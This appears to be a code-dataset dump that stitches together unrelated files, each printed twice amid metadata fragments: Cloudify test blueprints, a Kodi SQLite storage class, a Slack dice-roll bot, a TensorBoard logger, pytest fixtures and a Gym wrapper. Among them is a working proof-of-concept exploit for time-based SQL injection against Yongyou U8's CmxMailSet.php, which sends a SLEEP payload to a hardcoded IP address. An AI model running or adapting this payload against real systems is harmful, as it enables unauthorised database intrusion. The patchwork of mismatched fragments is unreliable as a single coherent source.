self.assertEquals(1, len(deployment_plugins)) | en | 0.513214 | # # Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # # NOQA node_templates: test_node1: type: cloudify.nodes.Compute interfaces: test_interface: start: implementation: test_plugin.start inputs: {} relationships: - type: cloudify.relationships.my_relationship target: test_node2 test_node2: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: {} plugins: test_plugin: executor: host_agent source: dummy relationships: cloudify.relationships.my_relationship: source_interfaces: cloudify.interfaces.relationship_lifecycle: postconfigure: implementation: test_plugin.task.postconfigure inputs: {} node_templates: test_node1: type: cloudify.nodes.Compute relationships: - type: cloudify.relationships.my_relationship target: test_node2 test_node2: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: {} plugins: test_plugin: executor: host_agent source: dummy relationships: cloudify.relationships.my_relationship: source_interfaces: cloudify.interfaces.relationship_lifecycle: postconfigure: implementation: test_plugin.task.postconfigure inputs: {} # TODO issue #1 in test_plugins_to_install node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_plugin.start inputs: {} plugins: test_plugin: executor: host_agent source: dummy node_templates: 
test_node1: type: cloudify.nodes.Compute test_node2: type: test_type relationships: - type: cloudify.relationships.contained_in target: test_node1 test_node3: type: test_type2 relationships: - type: cloudify.relationships.contained_in target: test_node2 test_node4: type: test_type relationships: - type: cloudify.relationships.contained_in target: test_node3 node_types: cloudify.nodes.Compute: {} test_type: interfaces: test_interface: start: implementation: test_plugin.start inputs: {} test_type2: interfaces: test_interface2: install: implementation: test_plugin2.install inputs: {} relationships: cloudify.relationships.contained_in: {} plugins: test_plugin: executor: host_agent source: dummy test_plugin2: executor: host_agent source: dummy # TODO issue #2 in test_plugins_to_install # ensuring non-host nodes don't have this field test_node2: type: test_type relationships: - type: test_relationship target: test_node source_interfaces: test_interface1: install: test_plugin1.install - type: test_relationship target: test_node target_interfaces: test_interface1: install: test_plugin2.install relationships: test_relationship: {} plugins: test_plugin1: executor: central_deployment_agent source: dummy test_plugin2: executor: central_deployment_agent source: dummy # expecting the other plugin to be under test_node rather than # test_node2: node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_plugin.start inputs: {} create: implementation: test_management_plugin.create inputs: {} plugins: test_plugin: executor: host_agent source: dummy test_management_plugin: executor: central_deployment_agent source: dummy # check the property on the plan is correct node_types: test_type: {} node_templates: test_node1: type: test_type interfaces: test_interface: start: implementation: test_plugin.start executor: central_deployment_agent plugins: test_plugin: executor: host_agent source: dummy # 
TODO issue #3 in test_plugins_to_install # check the property on the plan is correct node_templates: test_node1: type: cloudify.nodes.Root node_types: cloudify.nodes.Root: interfaces: test_interface: start: implementation: cloud.server.start inputs: {} plugins: cloud: executor: central_deployment_agent source: dummy node_templates: test_node1: type: cloudify.nodes.Compute test_node2: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_management_plugin.start inputs: {} plugins: test_management_plugin: executor: central_deployment_agent source: dummy node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_management_plugin1.start inputs: {} create: implementation: test_management_plugin2.create inputs: {} plugins: test_management_plugin1: executor: central_deployment_agent source: dummy test_management_plugin2: executor: central_deployment_agent source: dummy # TODO issue #4 in test_plugins_to_install # check the property on the plan is correct node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_management_plugin.start inputs: {} create: implementation: test_management_plugin.create inputs: {} plugins: test_management_plugin: executor: central_deployment_agent source: dummy # check the property on the plan is correct | 1.913796 | 2 |
lib/storage.py | i96751414/plugin.video.flix | 7 | 6613957 | <filename>lib/storage.py
import os
import sqlite3
from lib.api.flix.kodi import ADDON_DATA
class Storage(object):
def __init__(self, database):
self.conn = sqlite3.connect(database)
self.cursor = self.conn.cursor()
def execute_and_commit(self, *args, **kwargs):
self.execute(*args, **kwargs)
self.commit()
def execute(self, *args, **kwargs):
return self.cursor.execute(*args, **kwargs)
def commit(self):
self.conn.commit()
def select_page(self, query, size, page_number, *args, **kwargs):
return self.cursor.execute(query + " LIMIT {:d} OFFSET {:d}".format(size, size * (page_number - 1)),
*args, **kwargs)
def pages_count(self, table_name, page_size, **kwargs):
return (self.count(table_name, **kwargs) + page_size - 1) // page_size
def delete(self, table_name, **kwargs):
where, values = self._where(kwargs)
self.execute_and_commit("DELETE FROM `{}`{}".format(table_name, where), values)
def count(self, table_name, **kwargs):
where, values = self._where(kwargs)
return self.cursor.execute("SELECT COUNT(*) FROM `{}`{}".format(table_name, where), values).fetchone()[0]
def fetch_batches(self, size, *args, **kwargs):
result = self.execute(*args, **kwargs)
while True:
rows = result.fetchmany(size)
if not rows:
break
yield rows
def fetch_items(self, *args, **kwargs):
batch_size = kwargs.pop("batch_size", 20)
for rows in self.fetch_batches(batch_size, *args, **kwargs):
for row in rows:
yield row
def close(self):
self.cursor.close()
self.conn.close()
@staticmethod
def _where(kwargs):
keys = tuple(kwargs)
if keys:
where = " WHERE " + " AND ".join(["{} = ?".format(k) for k in keys])
values = tuple(kwargs[k] for k in keys)
else:
where = ""
values = ()
return where, values
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class SearchHistory(object):
def __init__(self):
self._storage = Storage(os.path.join(ADDON_DATA, "search_history.sqlite"))
self._table_name = "search_history"
self._storage.execute_and_commit(
"CREATE TABLE IF NOT EXISTS `{}` ("
"id INTEGER PRIMARY KEY, "
"last_modified TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, "
"type INTEGER NOT NULL, "
"search TEXT CHECK(search <> '') NOT NULL, "
"UNIQUE(type, search)"
")".format(self._table_name))
self._page_size = 20
def get_page(self, search_type, page_number):
return self._storage.select_page(
"SELECT id, search FROM `{}` WHERE type = ? ORDER BY last_modified DESC".format(self._table_name),
self._page_size, page_number, (search_type,)).fetchall()
def add_entry(self, search_type, search):
# ON CONFLICT(search) DO UPDATE SET last_modified = CURRENT_TIMESTAMP
self._storage.execute_and_commit(
"INSERT INTO `{}` (type, search) VALUES(?, ?);".format(self._table_name), (search_type, search))
def update_entry(self, search_type, old_search, new_search):
self._storage.execute_and_commit(
"UPDATE `{}` SET search = ?, last_modified = CURRENT_TIMESTAMP "
"WHERE type = ? AND search = ?;".format(self._table_name), (new_search, search_type, old_search))
def delete_entry_by_id(self, search_id):
self._storage.delete(self._table_name, id=search_id)
def delete_entry(self, search_type, search):
self._storage.delete(self._table_name, type=search_type, search=search)
def pages_count(self, search_type):
return self._storage.pages_count(self._table_name, self._page_size, type=search_type)
def clear_entries(self):
self._storage.delete(self._table_name)
def close(self):
self._storage.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
| <filename>lib/storage.py
import os
import sqlite3
from lib.api.flix.kodi import ADDON_DATA
class Storage(object):
def __init__(self, database):
self.conn = sqlite3.connect(database)
self.cursor = self.conn.cursor()
def execute_and_commit(self, *args, **kwargs):
self.execute(*args, **kwargs)
self.commit()
def execute(self, *args, **kwargs):
return self.cursor.execute(*args, **kwargs)
def commit(self):
self.conn.commit()
def select_page(self, query, size, page_number, *args, **kwargs):
return self.cursor.execute(query + " LIMIT {:d} OFFSET {:d}".format(size, size * (page_number - 1)),
*args, **kwargs)
def pages_count(self, table_name, page_size, **kwargs):
return (self.count(table_name, **kwargs) + page_size - 1) // page_size
def delete(self, table_name, **kwargs):
where, values = self._where(kwargs)
self.execute_and_commit("DELETE FROM `{}`{}".format(table_name, where), values)
def count(self, table_name, **kwargs):
where, values = self._where(kwargs)
return self.cursor.execute("SELECT COUNT(*) FROM `{}`{}".format(table_name, where), values).fetchone()[0]
def fetch_batches(self, size, *args, **kwargs):
result = self.execute(*args, **kwargs)
while True:
rows = result.fetchmany(size)
if not rows:
break
yield rows
def fetch_items(self, *args, **kwargs):
batch_size = kwargs.pop("batch_size", 20)
for rows in self.fetch_batches(batch_size, *args, **kwargs):
for row in rows:
yield row
def close(self):
self.cursor.close()
self.conn.close()
@staticmethod
def _where(kwargs):
keys = tuple(kwargs)
if keys:
where = " WHERE " + " AND ".join(["{} = ?".format(k) for k in keys])
values = tuple(kwargs[k] for k in keys)
else:
where = ""
values = ()
return where, values
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class SearchHistory(object):
def __init__(self):
self._storage = Storage(os.path.join(ADDON_DATA, "search_history.sqlite"))
self._table_name = "search_history"
self._storage.execute_and_commit(
"CREATE TABLE IF NOT EXISTS `{}` ("
"id INTEGER PRIMARY KEY, "
"last_modified TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, "
"type INTEGER NOT NULL, "
"search TEXT CHECK(search <> '') NOT NULL, "
"UNIQUE(type, search)"
")".format(self._table_name))
self._page_size = 20
def get_page(self, search_type, page_number):
return self._storage.select_page(
"SELECT id, search FROM `{}` WHERE type = ? ORDER BY last_modified DESC".format(self._table_name),
self._page_size, page_number, (search_type,)).fetchall()
def add_entry(self, search_type, search):
# ON CONFLICT(search) DO UPDATE SET last_modified = CURRENT_TIMESTAMP
self._storage.execute_and_commit(
"INSERT INTO `{}` (type, search) VALUES(?, ?);".format(self._table_name), (search_type, search))
def update_entry(self, search_type, old_search, new_search):
self._storage.execute_and_commit(
"UPDATE `{}` SET search = ?, last_modified = CURRENT_TIMESTAMP "
"WHERE type = ? AND search = ?;".format(self._table_name), (new_search, search_type, old_search))
def delete_entry_by_id(self, search_id):
self._storage.delete(self._table_name, id=search_id)
def delete_entry(self, search_type, search):
self._storage.delete(self._table_name, type=search_type, search=search)
def pages_count(self, search_type):
return self._storage.pages_count(self._table_name, self._page_size, type=search_type)
def clear_entries(self):
self._storage.delete(self._table_name)
def close(self):
self._storage.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
| en | 0.573725 | # ON CONFLICT(search) DO UPDATE SET last_modified = CURRENT_TIMESTAMP | 2.791206 | 3 |
src/dungeonbot/plugins/roll.py | tlake/dungeonbot_backup | 0 | 6613958 | <reponame>tlake/dungeonbot_backup
"""Define logic for the Roll plugin."""
from dungeonbot.plugins.primordials import BangCommandPlugin
from dungeonbot.handlers.slack import SlackHandler
from dungeonbot.plugins.helpers.die_roll import DieRoll
from dungeonbot.models.roll import RollModel
class RollPlugin(BangCommandPlugin):
"""Plugin for roll."""
help_text = """```
command:
!roll
description:
Rolls dice for you.
This command is whitespace-agnostic.
("1d2+2" will be processed exactly the same as "1 d 2 +2")
You can specify multiple die rolls in the same command as long as they
are separated by commas.
You can specify a roll to be made with advantage by prepending the roll
with the `-a` flag (or just `a`), or with disadvantage by prepending the
roll with `-d` (or just `d`).
You can also save a roll with a name, and then use that name later.
<PARAMS> are required
[PARAMS] are optional
usage:
!roll [ADVANTAGE/DISADVANTAGE] <HOW MANY> d <SIDES> [+/-MODIFIER] [, ... ]
!roll [SAVE/LIST/DELETE] <NAMED ROLL>
!roll [ADVANTAGE/DISADVANTAGE] <NAMED ROLL>
examples:
!roll 2d6
!roll -d 1d20-2
!roll a 1d20+4, 4d6, -d 1d20+3
!roll save fireballdmg 8d6
!roll fireballdmg
!roll list
!roll delete fireballdmg
```"""
def run(self):
"""Run Roll Plugin."""
bot = SlackHandler()
user = bot.get_user_obj_from_id(self.event['user'])
args = self.arg_string.split(",")
message = "_*Roll result{} for {}:*_".format(
"s" if len(args) > 1 else "",
user["name"],
)
for item in args:
message += "\n" + self.process_roll(item, user)
bot.make_post(self.event, message)
def process_roll(self, user_input, user):
"""Parse user input and delegate to appropriate roll func."""
args = user_input.split()
commands = {
"save": self.save_roll,
"list": self.list_rolls,
"delete": self.delete_roll,
}
if args[0] in commands:
return commands[args[0]](args[1:], user)
# test = user_input.replace(" ", "").split("d")
# if not test[0].isdigit() or not test[1].isdigit():
# return "Not a valid command."
# else:
# return self.make_roll(args, user)
# Shitty removal of validation, instead of a proper refactor
# The issue is that the above block considers a roll with
# advantage or disadvantage to be invalid
# - example: "-a 1d20" is invalid here
return self.make_roll(args, user)
def is_valid_roll_string(self, roll_str):
"""Check if roll string is valid, with or without a flag."""
if not roll_str[0].isdigit():
roll_str = roll_str[1:]
return roll_str[0].isdigit() and roll_str[1] == "d" and roll_str[2].isdigit()
def save_roll(self, args, user):
"""Save new roll as key/val pair for requesting user."""
key = args[0]
val = "".join(args[1:])
if not (key and val):
return "Not a valid Key/Pair."
if not self.is_valid_roll_string(val):
return "Not a properly formatted roll string."
instance = RollModel.new(key=key, val=val, user=user)
return "Successfully Saved " + instance.slack_msg
def delete_roll(self, args, user):
"""Delete existing roll via key."""
key = "".join(args)
instance = RollModel.get(key=key, user=user)
if instance:
return "{} was successfully deleted.".format(RollModel.delete(instance))
else:
return "Cannot find item {}".format(key)
def list_rolls(self, args, user):
"""List requesting user's saved rolls.
If additional argument is passed in, use as limit,
otherwise limit to 10 results returned.
"""
message = "*Saved Rolls for {}:*".format(user["name"])
how_many = int("".join(args)) if args else 10
saved = RollModel.list(how_many=how_many, user=user)
for x in saved:
message += "\n" + x.slack_msg
return message
def parse_flag_and_roll_string(self, args):
"""Separate roll string and flag from args. Accepts a list and returns a string."""
roll_flags = ["a", "d"]
flag = None
arg = args[0].lstrip("-")
if arg[0] in roll_flags:
flag = arg[0]
roll_str = "".join(args[1:])
else:
roll_str = "".join(args)
return roll_str, flag
def make_roll(self, args, user):
"""Roll given roll string and return result.
If given roll string is existing saved string, look
up entry and roll the associated value.
"""
name, temp_flag = None, None
roll_str, flag = self.parse_flag_and_roll_string(args)
saved_roll = RollModel.get(key=roll_str, user=user)
if saved_roll:
name = saved_roll.key
roll_str, temp_flag = self.parse_flag_and_roll_string([saved_roll.val])
r = DieRoll(roll_str, temp_flag or flag)
return r.print_results(r.action(), name)
| """Define logic for the Roll plugin."""
from dungeonbot.plugins.primordials import BangCommandPlugin
from dungeonbot.handlers.slack import SlackHandler
from dungeonbot.plugins.helpers.die_roll import DieRoll
from dungeonbot.models.roll import RollModel
class RollPlugin(BangCommandPlugin):
"""Plugin for roll."""
help_text = """```
command:
!roll
description:
Rolls dice for you.
This command is whitespace-agnostic.
("1d2+2" will be processed exactly the same as "1 d 2 +2")
You can specify multiple die rolls in the same command as long as they
are separated by commas.
You can specify a roll to be made with advantage by prepending the roll
with the `-a` flag (or just `a`), or with disadvantage by prepending the
roll with `-d` (or just `d`).
You can also save a roll with a name, and then use that name later.
<PARAMS> are required
[PARAMS] are optional
usage:
!roll [ADVANTAGE/DISADVANTAGE] <HOW MANY> d <SIDES> [+/-MODIFIER] [, ... ]
!roll [SAVE/LIST/DELETE] <NAMED ROLL>
!roll [ADVANTAGE/DISADVANTAGE] <NAMED ROLL>
examples:
!roll 2d6
!roll -d 1d20-2
!roll a 1d20+4, 4d6, -d 1d20+3
!roll save fireballdmg 8d6
!roll fireballdmg
!roll list
!roll delete fireballdmg
```"""
def run(self):
"""Run Roll Plugin."""
bot = SlackHandler()
user = bot.get_user_obj_from_id(self.event['user'])
args = self.arg_string.split(",")
message = "_*Roll result{} for {}:*_".format(
"s" if len(args) > 1 else "",
user["name"],
)
for item in args:
message += "\n" + self.process_roll(item, user)
bot.make_post(self.event, message)
def process_roll(self, user_input, user):
"""Parse user input and delegate to appropriate roll func."""
args = user_input.split()
commands = {
"save": self.save_roll,
"list": self.list_rolls,
"delete": self.delete_roll,
}
if args[0] in commands:
return commands[args[0]](args[1:], user)
# test = user_input.replace(" ", "").split("d")
# if not test[0].isdigit() or not test[1].isdigit():
# return "Not a valid command."
# else:
# return self.make_roll(args, user)
# Shitty removal of validation, instead of a proper refactor
# The issue is that the above block considers a roll with
# advantage or disadvantage to be invalid
# - example: "-a 1d20" is invalid here
return self.make_roll(args, user)
def is_valid_roll_string(self, roll_str):
"""Check if roll string is valid, with or without a flag."""
if not roll_str[0].isdigit():
roll_str = roll_str[1:]
return roll_str[0].isdigit() and roll_str[1] == "d" and roll_str[2].isdigit()
def save_roll(self, args, user):
"""Save new roll as key/val pair for requesting user."""
key = args[0]
val = "".join(args[1:])
if not (key and val):
return "Not a valid Key/Pair."
if not self.is_valid_roll_string(val):
return "Not a properly formatted roll string."
instance = RollModel.new(key=key, val=val, user=user)
return "Successfully Saved " + instance.slack_msg
def delete_roll(self, args, user):
"""Delete existing roll via key."""
key = "".join(args)
instance = RollModel.get(key=key, user=user)
if instance:
return "{} was successfully deleted.".format(RollModel.delete(instance))
else:
return "Cannot find item {}".format(key)
def list_rolls(self, args, user):
"""List requesting user's saved rolls.
If additional argument is passed in, use as limit,
otherwise limit to 10 results returned.
"""
message = "*Saved Rolls for {}:*".format(user["name"])
how_many = int("".join(args)) if args else 10
saved = RollModel.list(how_many=how_many, user=user)
for x in saved:
message += "\n" + x.slack_msg
return message
def parse_flag_and_roll_string(self, args):
"""Separate roll string and flag from args. Accepts a list and returns a string."""
roll_flags = ["a", "d"]
flag = None
arg = args[0].lstrip("-")
if arg[0] in roll_flags:
flag = arg[0]
roll_str = "".join(args[1:])
else:
roll_str = "".join(args)
return roll_str, flag
def make_roll(self, args, user):
"""Roll given roll string and return result.
If given roll string is existing saved string, look
up entry and roll the associated value.
"""
name, temp_flag = None, None
roll_str, flag = self.parse_flag_and_roll_string(args)
saved_roll = RollModel.get(key=roll_str, user=user)
if saved_roll:
name = saved_roll.key
roll_str, temp_flag = self.parse_flag_and_roll_string([saved_roll.val])
r = DieRoll(roll_str, temp_flag or flag)
return r.print_results(r.action(), name) | en | 0.700605 | Define logic for the Roll plugin. Plugin for roll. ``` command: !roll description: Rolls dice for you. This command is whitespace-agnostic. ("1d2+2" will be processed exactly the same as "1 d 2 +2") You can specify multiple die rolls in the same command as long as they are separated by commas. You can specify a roll to be made with advantage by prepending the roll with the `-a` flag (or just `a`), or with disadvantage by prepending the roll with `-d` (or just `d`). You can also save a roll with a name, and then use that name later. <PARAMS> are required [PARAMS] are optional usage: !roll [ADVANTAGE/DISADVANTAGE] <HOW MANY> d <SIDES> [+/-MODIFIER] [, ... ] !roll [SAVE/LIST/DELETE] <NAMED ROLL> !roll [ADVANTAGE/DISADVANTAGE] <NAMED ROLL> examples: !roll 2d6 !roll -d 1d20-2 !roll a 1d20+4, 4d6, -d 1d20+3 !roll save fireballdmg 8d6 !roll fireballdmg !roll list !roll delete fireballdmg ``` Run Roll Plugin. Parse user input and delegate to appropriate roll func. # test = user_input.replace(" ", "").split("d") # if not test[0].isdigit() or not test[1].isdigit(): # return "Not a valid command." # else: # return self.make_roll(args, user) # Shitty removal of validation, instead of a proper refactor # The issue is that the above block considers a roll with # advantage or disadvantage to be invalid # - example: "-a 1d20" is invalid here Check if roll string is valid, with or without a flag. Save new roll as key/val pair for requesting user. Delete existing roll via key. List requesting user's saved rolls. If additional argument is passed in, use as limit, otherwise limit to 10 results returned. Separate roll string and flag from args. Accepts a list and returns a string. Roll given roll string and return result. If given roll string is existing saved string, look up entry and roll the associated value. | 2.842339 | 3 |
torch_tools/training/util/logger.py | gregunz/TorchTools | 0 | 6613959 | <reponame>gregunz/TorchTools
from abc import abstractmethod, ABCMeta
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from torch_tools.metrics import compute_roc_auc, create_roc_figure
class Logger:
@property
@abstractmethod
def logger(self) -> SummaryWriter:
raise NotImplementedError
def log_auc_roc(self, tag, outputs, targets, global_step):
fpr, tpr, _, auc = compute_roc_auc(outputs, targets)
roc_figure = create_roc_figure(fpr, tpr)
self.logger.add_figure(
tag=f'{tag}/roc',
figure=roc_figure,
global_step=global_step,
)
self.logger.add_scalar(
tag=f'{tag}/auc',
scalar_value=auc,
global_step=global_step,
)
return auc
class ImageLogger(Logger, metaclass=ABCMeta):
def __init__(self, output_to_image):
self.output_to_img = output_to_image
def log_images(self, tag, images_tensor, global_step):
if images_tensor.dim() == 3:
images_tensor = images_tensor.unsqueeze(0)
num_cols = images_tensor.size(0)
num_rows = images_tensor.size(1)
images = []
for i in range(num_cols):
images += [self.output_to_img(images_tensor[i, img_idx]) for img_idx in range(num_rows)]
self.logger.add_image(
tag=tag,
img_tensor=make_grid(images, nrow=num_rows),
global_step=global_step,
)
| from abc import abstractmethod, ABCMeta
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from torch_tools.metrics import compute_roc_auc, create_roc_figure
class Logger:
@property
@abstractmethod
def logger(self) -> SummaryWriter:
raise NotImplementedError
def log_auc_roc(self, tag, outputs, targets, global_step):
fpr, tpr, _, auc = compute_roc_auc(outputs, targets)
roc_figure = create_roc_figure(fpr, tpr)
self.logger.add_figure(
tag=f'{tag}/roc',
figure=roc_figure,
global_step=global_step,
)
self.logger.add_scalar(
tag=f'{tag}/auc',
scalar_value=auc,
global_step=global_step,
)
return auc
class ImageLogger(Logger, metaclass=ABCMeta):
def __init__(self, output_to_image):
self.output_to_img = output_to_image
def log_images(self, tag, images_tensor, global_step):
if images_tensor.dim() == 3:
images_tensor = images_tensor.unsqueeze(0)
num_cols = images_tensor.size(0)
num_rows = images_tensor.size(1)
images = []
for i in range(num_cols):
images += [self.output_to_img(images_tensor[i, img_idx]) for img_idx in range(num_rows)]
self.logger.add_image(
tag=tag,
img_tensor=make_grid(images, nrow=num_rows),
global_step=global_step,
) | none | 1 | 2.275107 | 2 | |
tests/conftest.py | sprat/sfrbox-client | 0 | 6613960 | <gh_stars>0
"""
Fixtures for tests
"""
# pylint: disable=redefined-outer-name
import pytest
import pkg_resources
from neufbox import Client
@pytest.fixture
def client():
"""Return a client instance"""
return Client('192.168.1.1')
def read_xml(filename):
"""Read a XML test file"""
filepath = pkg_resources.resource_filename(__name__, filename)
with open(filepath, 'r') as xml_file:
return xml_file.read()
@pytest.fixture
def mock_get_request(client, requests_mock):
"""Mock a GET request to the API"""
def func(url_query, xml_filename):
return requests_mock.get(f'{client.api_url}{url_query}', text=read_xml(xml_filename))
return func
@pytest.fixture
def mock_post_request(client, requests_mock):
"""Mock a POST request to the API"""
def func(url_query):
return requests_mock.post(f'{client.api_url}{url_query}', text=read_xml('empty.xml'))
return func
| """
Fixtures for tests
"""
# pylint: disable=redefined-outer-name
import pytest
import pkg_resources
from neufbox import Client
@pytest.fixture
def client():
"""Return a client instance"""
return Client('192.168.1.1')
def read_xml(filename):
"""Read a XML test file"""
filepath = pkg_resources.resource_filename(__name__, filename)
with open(filepath, 'r') as xml_file:
return xml_file.read()
@pytest.fixture
def mock_get_request(client, requests_mock):
"""Mock a GET request to the API"""
def func(url_query, xml_filename):
return requests_mock.get(f'{client.api_url}{url_query}', text=read_xml(xml_filename))
return func
@pytest.fixture
def mock_post_request(client, requests_mock):
"""Mock a POST request to the API"""
def func(url_query):
return requests_mock.post(f'{client.api_url}{url_query}', text=read_xml('empty.xml'))
return func | en | 0.651 | Fixtures for tests # pylint: disable=redefined-outer-name Return a client instance Read a XML test file Mock a GET request to the API Mock a POST request to the API | 2.546603 | 3 |
Bugscan_exploits-master/exp_list/exp-1969.py | csadsl/poc_exp | 11 | 6613961 | <reponame>csadsl/poc_exp<gh_stars>10-100
#/usr/bin/python
#-*- coding: utf-8 -*-
"""
POC Name : 用友u8 CmxMailSet.php sql注入
Author : a
mail : <EMAIL>
Refer : http://www.wooyun.org/bugs/wooyun-2015-156891
"""
import re
import time
def assign(service, arg):
if service == "yongyou_u8":
return True, arg
def audit(arg):
url = arg + "Server/CmxMailSet.php"
data_poc = "sendmail=test' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm&username=test"
data = "sendmail=test&username=test"
time1 = time.time()
code1, head, res, errcode, _ = curl.curl2(url, data)
time2 = time.time()
true_time=time2-time1
time3 = time.time()
code2, head, res, errcode, _ = curl.curl2(url, data_poc)
time4 = time.time()
false_time =time4-time3
if code1==302 and code2==302 and false_time-true_time > 6:
security_hole(url + ' sql injection!')
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_u8', 'http://172.16.31.10:81/')[1]) | #/usr/bin/python
#-*- coding: utf-8 -*-
"""
POC Name : 用友u8 CmxMailSet.php sql注入
Author : a
mail : <EMAIL>
Refer : http://www.wooyun.org/bugs/wooyun-2015-156891
"""
import re
import time
def assign(service, arg):
if service == "yongyou_u8":
return True, arg
def audit(arg):
url = arg + "Server/CmxMailSet.php"
data_poc = "sendmail=test' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm&username=test"
data = "sendmail=test&username=test"
time1 = time.time()
code1, head, res, errcode, _ = curl.curl2(url, data)
time2 = time.time()
true_time=time2-time1
time3 = time.time()
code2, head, res, errcode, _ = curl.curl2(url, data_poc)
time4 = time.time()
false_time =time4-time3
if code1==302 and code2==302 and false_time-true_time > 6:
security_hole(url + ' sql injection!')
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_u8', 'http://172.16.31.10:81/')[1]) | fr | 0.220242 | #/usr/bin/python #-*- coding: utf-8 -*- POC Name : 用友u8 CmxMailSet.php sql注入
Author : a
mail : <EMAIL>
Refer : http://www.wooyun.org/bugs/wooyun-2015-156891 | 2.256662 | 2 |
baconian/envs/gym_env.py | GilraGroup/baconian-project | 69 | 6613962 | <filename>baconian/envs/gym_env.py
from baconian.core.core import Env, EnvSpec
import gym.envs
from gym.envs.registration import registry
# do not remove the following import statements
import pybullet
import pybullet_envs
have_mujoco_flag = True
try:
from gym.envs.mujoco import mujoco_env
except Exception:
have_mujoco_flag = False
import numpy as np
import types
import gym.spaces as GymSpace
import baconian.common.spaces as garage_space
import gym.error as gym_error
_env_inited_count = dict()
def make(gym_env_id: str, allow_multiple_env=True):
    """
    Create a :class:`GymEnv` for the given gym environment id.

    :param gym_env_id: gym environment id
    :type gym_env_id: int
    :param allow_multiple_env: when True (default), give each instance of the
        same env id a unique ``<id>_<index>`` name so several can coexist
    :type allow_multiple_env: bool
    :return: new gym environment
    :rtype: GymEnv
    """
    if allow_multiple_env is True:
        # Per-id instance counter: first instance gets index 0.
        next_index = _env_inited_count.get(gym_env_id, -1) + 1
        _env_inited_count[gym_env_id] = next_index
        return GymEnv(gym_env_id, name='{}_{}'.format(gym_env_id, next_index))
    return GymEnv(gym_env_id)
def space_converter(space: GymSpace.Space):
    """
    Convert a gym space into the equivalent baconian/garage space.

    :param space: space of gym environment
    :type space: GymSpace
    :return: converted space
    :rtype: Box, Dict, Discrete, or Tuple
    :raises NotImplementedError: for gym space types not handled below
    """
    if isinstance(space, GymSpace.Box):
        # NOTE(review): only low/high are forwarded; shape/dtype are assumed
        # to be recoverable from the bound arrays — confirm for scalar bounds.
        return garage_space.Box(low=space.low, high=space.high)
    elif isinstance(space, GymSpace.Dict):
        # NOTE(review): the contained sub-spaces are passed through without
        # recursive conversion; verify garage_space.Dict accepts gym spaces.
        return garage_space.Dict(space.spaces)
    elif isinstance(space, GymSpace.Discrete):
        return garage_space.Discrete(space.n)
    elif isinstance(space, GymSpace.Tuple):
        # Recursively convert each member of the tuple space.
        return garage_space.Tuple(list(map(space_converter, space.spaces)))
    else:
        raise NotImplementedError
class GymEnv(Env):
    """
    Wrapper that adapts an OpenAI Gym environment to the baconian ``Env``
    interface (space conversion, NaN-safe sampling, state extraction).
    """
    # All environment ids known to the gym registry at import time.
    _all_gym_env_id = list(registry.env_specs.keys())

    def __init__(self, gym_env_id: str, name: str = None):
        """
        :param gym_env_id: gym environment id
        :type gym_env_id: str
        :param name: name of the gym environment instance, defaults to ``gym_env_id``
        :type name: str
        :raises ValueError: if ``gym_env_id`` is not registered with gym
        """
        super().__init__(name=name if name else gym_env_id)
        self.env_id = gym_env_id
        try:
            self._gym_env = gym.make(gym_env_id)
        except gym_error.UnregisteredEnv as e:
            raise ValueError('Env id: {} is not supported currently'.format(gym_env_id)) from e
        # Bug fix: the original code called gym.make() a second, redundant
        # time here, discarding the instance created in the try block above.
        self.action_space = space_converter(self._gym_env.action_space)
        self.observation_space = space_converter(self._gym_env.observation_space)
        # Sanitize infinite/NaN bounds and install a bounded sampler, since
        # uniform sampling over (-inf, inf) boxes is not meaningful.
        if isinstance(self.action_space, garage_space.Box):
            self.action_space.low = np.nan_to_num(self.action_space.low)
            self.action_space.high = np.nan_to_num(self.action_space.high)
            self.action_space.sample = types.MethodType(self._sample_with_nan, self.action_space)
        if isinstance(self.observation_space, garage_space.Box):
            self.observation_space.low = np.nan_to_num(self.observation_space.low)
            self.observation_space.high = np.nan_to_num(self.observation_space.high)
            self.observation_space.sample = types.MethodType(self._sample_with_nan, self.observation_space)
        self.env_spec = EnvSpec(obs_space=self.observation_space,
                                action_space=self.action_space)
        self.reward_range = self._gym_env.reward_range

    def step(self, action):
        """
        Run one timestep of the wrapped environment.

        :param action: action to be taken by the agent in the environment
        :return: ``(state, reward, done, info)`` from the wrapped env,
            with ``done`` coerced to a plain bool
        """
        super().step(action)
        action = self.env_spec.flat_action(action)
        state, re, done, info = self.unwrapped.step(action=action)
        return state, re, bool(done), info

    def reset(self):
        """Reset the wrapped gym environment and return its initial state."""
        super().reset()
        return self.unwrapped.reset()

    def init(self):
        """Initialize the environment (implemented as a reset)."""
        super().init()
        return self.reset()

    def seed(self, seed=None):
        """
        :param seed: seed of the random number generator
        :type seed: int
        :return: seed of the unwrapped environment
        :rtype: int
        """
        return super().seed(seed)

